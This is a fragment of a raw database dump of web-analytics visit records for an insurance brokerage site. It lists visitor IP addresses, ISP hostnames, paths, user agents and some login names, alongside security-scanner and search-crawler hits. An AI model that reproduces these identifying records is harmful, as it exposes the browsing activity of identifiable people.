Spider','','','','3','0',0),(19929,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251337','69.175.67.58','newscan04.sitelock.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19932,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251339','69.175.67.58','newscan04.sitelock.com','/agent-tools/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19934,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251341','69.175.67.58','newscan04.sitelock.com','/forms/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19937,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251344','69.175.67.58','newscan04.sitelock.com','/contact/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19940,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251345','69.175.67.58','newscan04.sitelock.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19943,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251349','69.175.67.58','newscan04.sitelock.com','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19944,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251351','69.175.67.58','newscan04.sitelock.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19946,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251353','69.175.67.58','newscan04.sitelock.com','/meet-the-eib-team/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19947,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251354','69.175.67.58','newscan04.sitelock.com','/igo/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19950,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251356','69.175.67.58','newscan04.sitelock.com','/register/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19952,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251358','69.175.67.58','newscan04.sitelock.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19955,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251360','69.175.67.58','newscan04.sitelock.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19956,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251362','69.175.67.58','newscan04.sitelock.com','/about-us/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19958,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251365','69.175.67.58','newscan04.sitelock.com','/licensing-contracting/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19961,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251368','69.175.67.58','newscan04.sitelock.com','/members/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19962,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251371','69.175.67.58','newscan04.sitelock.com','/carriers/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19964,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251373','69.175.67.58','newscan04.sitelock.com','/case-status/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19967,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251375','69.175.67.58','newscan04.sitelock.com','/case-status/?a=register&addr1=1&addr2=1&city=1&country=1&first_name=1&last_name=1&log=1&phone1=1&redirect_to=http://www.empireins.com/case-status/&submit=Register&thestate=1&user_email=1&zip=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19970,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251375','69.175.67.58','newscan04.sitelock.com','/insentives/?a=register&addr1=1&addr2=1&city=1&country=1&first_name=1&last_name=1&log=1&phone1=1&redirect_to=http://www.empireins.com/insentives/&submit=Register&thestate=1&user_email=1&zip=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19971,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251376','69.175.67.58','newscan04.sitelock.com','/aig-releases-new-term-rates-and-re-enters-ny/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19974,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251377','69.175.67.58','newscan04.sitelock.com','/licensing-contracting/?a=register&addr1=1&addr2=1&city=1&country=1&first_name=1&last_name=1&log=1&phone1=1&redirect_to=http://www.empireins.com/licensing-contracting/&submit=Register&thestate=1&user_email=1&zip=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19977,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251377','69.175.67.58','newscan04.sitelock.com','/carriers/?a=register&addr1=1&addr2=1&city=1&country=1&first_name=1&last_name=1&log=1&phone1=1&redirect_to=http://www.empireins.com/carriers/&submit=Register&thestate=1&user_email=1&zip=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19980,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251379','69.175.67.58','newscan04.sitelock.com','/agent-tools/?a=register&addr1=1&addr2=1&city=1&country=1&first_name=1&last_name=1&log=1&phone1=1&redirect_to=http://www.empireins.com/agent-tools/&submit=Register&thestate=1&user_email=1&zip=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19982,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251380','69.175.67.58','newscan04.sitelock.com','/term-quotes/?a=register&addr1=1&addr2=1&city=1&country=1&first_name=1&last_name=1&log=1&phone1=1&redirect_to=http://www.empireins.com/term-quotes/&submit=Register&thestate=1&user_email=1&zip=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19983,'0b_fb88520e94e7a48a2f9c0b16c57aa9d9','1461251381','69.175.67.58','newscan04.sitelock.com','/?p=290','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(19985,'0b_fb88520e94e7a48a2f9c0b16c57aa9d9','1461251382','69.175.67.58','newscan04.sitelock.com','/?p=309','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(19986,'0b_fb88520e94e7a48a2f9c0b16c57aa9d9','1461251383','69.175.67.58','newscan04.sitelock.com','/?p=311','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(19988,'0b_fb88520e94e7a48a2f9c0b16c57aa9d9','1461251384','69.175.67.58','newscan04.sitelock.com','/?p=171','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(19989,'0b_fb88520e94e7a48a2f9c0b16c57aa9d9','1461251384','69.175.67.58','newscan04.sitelock.com','/?p=8','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(19992,'0b_fb88520e94e7a48a2f9c0b16c57aa9d9','1461251385','69.175.67.58','newscan04.sitelock.com','/?p=306','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(19995,'0b_fb88520e94e7a48a2f9c0b16c57aa9d9','1461251385','69.175.67.58','newscan04.sitelock.com','/?p=319','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(19998,'0b_fb88520e94e7a48a2f9c0b16c57aa9d9','1461251386','69.175.67.58','newscan04.sitelock.com','/?p=277','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(20000,'0b_fb88520e94e7a48a2f9c0b16c57aa9d9','1461251386','69.175.67.58','newscan04.sitelock.com','/?p=10','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(20003,'0b_fb88520e94e7a48a2f9c0b16c57aa9d9','1461251387','69.175.67.58','newscan04.sitelock.com','/?p=303','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(20004,'0b_fb88520e94e7a48a2f9c0b16c57aa9d9','1461251387','69.175.67.58','newscan04.sitelock.com','/?p=288','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(20007,'0b_fb88520e94e7a48a2f9c0b16c57aa9d9','1461251389','69.175.67.58','newscan04.sitelock.com','/?p=283','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(20009,'0b_fb88520e94e7a48a2f9c0b16c57aa9d9','1461251391','69.175.67.58','newscan04.sitelock.com','/?p=169','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(20010,'0b_fb88520e94e7a48a2f9c0b16c57aa9d9','1461251391','69.175.67.58','newscan04.sitelock.com','/?p=347','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(20013,'0b_fb88520e94e7a48a2f9c0b16c57aa9d9','1461251392','69.175.67.58','newscan04.sitelock.com','/?p=9','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(20015,'0b_fb88520e94e7a48a2f9c0b16c57aa9d9','1461251392','69.175.67.58','newscan04.sitelock.com','/?p=181','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(20018,'0b_299771752ecc0ac76f79a20397f78207','1461251937','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(20021,'0b_299771752ecc0ac76f79a20397f78207','1461251946','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(20022,'0b_c988b8ada2c2fbe35b6cd64d42842502','1461253201','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','[404] /favicon.gif','Mozilla/4.0 (compatible; GoogleToolbar 7.5.7210.1528; Windows 6.1; MSIE 9.0.8112.16421)','','',0,'','Netscape 4','','','','','','','','0','0',0),(20025,'0b_27b638f2f91a9fe5282c8305f494f538','1461253378','72.177.107.184','cpe-72-177-107-184.austin.res.rr.com','/','Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.699.0 Safari/534.24','','',0,'WinVista','Chrome 11','us','','','','','','','0','0',0),(20028,'0b_971179d0f1cfa41bb42028971e54c0f6','1461253380','72.177.107.184','cpe-72-177-107-184.austin.res.rr.com','/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1','','',0,'Linux','Chrome 13','us','','','','','','','0','0',0),(20031,'0b_f0a256e84a807740ef2e622ff5db91bd','1461253670','157.55.39.141','msnbot-157-55-39-141.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20034,'0b_f0a256e84a807740ef2e622ff5db91bd','1461253672','157.55.39.141','msnbot-157-55-39-141.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20036,'0b_f0a256e84a807740ef2e622ff5db91bd','1461253672','157.55.39.141','msnbot-157-55-39-141.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20037,'0b_f0a256e84a807740ef2e622ff5db91bd','1461253725','157.55.39.149','msnbot-157-55-39-149.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20040,'0b_f0a256e84a807740ef2e622ff5db91bd','1461253726','157.55.39.149','msnbot-157-55-39-149.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20043,'0b_f0a256e84a807740ef2e622ff5db91bd','1461253727','157.55.39.149','msnbot-157-55-39-149.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20045,'0b_a5f3f3906eb1a5ce0e057259e4c3ea60','1461253731','207.46.13.122','msnbot-207-46-13-122.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20046,'0b_a5f3f3906eb1a5ce0e057259e4c3ea60','1461253732','207.46.13.122','msnbot-207-46-13-122.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20048,'0b_a5f3f3906eb1a5ce0e057259e4c3ea60','1461253732','207.46.13.122','msnbot-207-46-13-122.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20049,'0b_a5f3f3906eb1a5ce0e057259e4c3ea60','1461253733','207.46.13.122','msnbot-207-46-13-122.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20051,'0b_a5f3f3906eb1a5ce0e057259e4c3ea60','1461253734','207.46.13.122','msnbot-207-46-13-122.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20052,'0b_a5f3f3906eb1a5ce0e057259e4c3ea60','1461253735','207.46.13.122','msnbot-207-46-13-122.search.msn.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20055,'0b_3b85ca3e197a877935e43c04c8ee8720','1461254799','66.162.113.126','66.162.113.126','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.surancebay.com/surancebays-clients-business-teams-2.html','',0,'Win7 x64','IE 9','us','','','','','','','0','0',0),(20058,'0b_3b85ca3e197a877935e43c04c8ee8720','1461254811','66.162.113.126','66.162.113.126','/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.empireins.com/','',0,'Win7 x64','IE 9','us','','','','','','','0','0',0),(20060,'0b_3b85ca3e197a877935e43c04c8ee8720','1461254811','66.162.113.126','66.162.113.126','/comments/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.empireins.com/','',0,'Win7 x64','IE 9','us','','','','','','','0','0',0),(20061,'0b_3b85ca3e197a877935e43c04c8ee8720','1461254821','66.162.113.126','66.162.113.126','/home/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.empireins.com/','',0,'Win7 x64','IE 9','us','','','','','','','0','0',0),(20064,'0b_3b85ca3e197a877935e43c04c8ee8720','1461254821','66.162.113.126','66.162.113.126','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.empireins.com/','',0,'Win7 x64','IE 9','us','','','','','','','0','0',0),(20067,'0b_3b85ca3e197a877935e43c04c8ee8720','1461254831','66.162.113.126','66.162.113.126','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.empireins.com/','',0,'Win7 x64','IE 9','us','','','','','','','0','0',0),(20070,'0b_b625187bb6264b72d8d49d9bfb69b9d0','1461254841','66.162.113.126','66.162.113.126','/assets/js/google-code-prettify/prettify.css','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(20073,'0b_22210de80a9133312580e228bba56827','1461257447','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win8','Chrome 49','us','1280 x 1024','','','','','','0','0',0),(20076,'0b_22210de80a9133312580e228bba56827','1461257448','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1280 x 1024','','','','','','0','0',0),(20079,'0b_22210de80a9133312580e228bba56827','1461257453','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1280 x 1024','','','','','','0','0',0),(20081,'0b_22210de80a9133312580e228bba56827','1461257514','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/forms/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 49','us','1280 x 1024','','','','Shmuli','','0','51',0),(20082,'0b_5eca419ca3a6517fcd2ab2fa295cc4b1','1461258368','66.249.69.55','crawl-66-249-69-55.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20085,'0b_756143c4f458d6e3a4da9c1043e7131d','1461259204','157.55.39.182','msnbot-157-55-39-182.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20087,'0b_26d698fd37c53841338e75479280ccd5','1461260039','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(20088,'0b_26d698fd37c53841338e75479280ccd5','1461260039','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(20090,'0b_28d3bae6ef126c95aaf78c33ec4ed5f5','1461260063','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 OPR/32.0.1948.89','','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(20091,'0b_28d3bae6ef126c95aaf78c33ec4ed5f5','1461260065','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 OPR/32.0.1948.89','http://www.empireins.com/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(20094,'0b_28d3bae6ef126c95aaf78c33ec4ed5f5','1461260067','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 OPR/32.0.1948.89','http://www.empireins.com/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(20097,'0b_28d3bae6ef126c95aaf78c33ec4ed5f5','1461260077','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/forms/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 OPR/32.0.1948.89','http://www.empireins.com/agent-tools/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','Shmuli','','0','51',0),(20100,'0b_91abd1696e6182c4337a86f43191963b','1461260501','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(20103,'0b_4c98dbf35f4b489edda968298273a05d','1461261658','96.95.138.241','96-95-138-241-static.hfc.comcastbusiness.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win10','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(20105,'0b_4c98dbf35f4b489edda968298273a05d','1461261661','96.95.138.241','96-95-138-241-static.hfc.comcastbusiness.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(20108,'0b_4c98dbf35f4b489edda968298273a05d','1461261690','96.95.138.241','96-95-138-241-static.hfc.comcastbusiness.net','/about-us/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(20111,'0b_4c98dbf35f4b489edda968298273a05d','1461261697','96.95.138.241','96-95-138-241-static.hfc.comcastbusiness.net','/insentives/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win10','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(20112,'0b_4c98dbf35f4b489edda968298273a05d','1461261700','96.95.138.241','96-95-138-241-static.hfc.comcastbusiness.net','/licensing-contracting/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/insentives/','',0,'Win10','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(20114,'0b_4c98dbf35f4b489edda968298273a05d','1461261705','96.95.138.241','96-95-138-241-static.hfc.comcastbusiness.net','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'Win10','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(20115,'0b_4c98dbf35f4b489edda968298273a05d','1461261795','96.95.138.241','96-95-138-241-static.hfc.comcastbusiness.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win10','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(20118,'0b_4c98dbf35f4b489edda968298273a05d','1461261797','96.95.138.241','96-95-138-241-static.hfc.comcastbusiness.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(20120,'0b_2e9fc366f54cafe06e737d731eaeae43','1461262482','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(20123,'0b_2e9fc366f54cafe06e737d731eaeae43','1461262483','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(20124,'0b_bac15f15d1a0df5b1c11aa83aaef02a6','1461262490','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 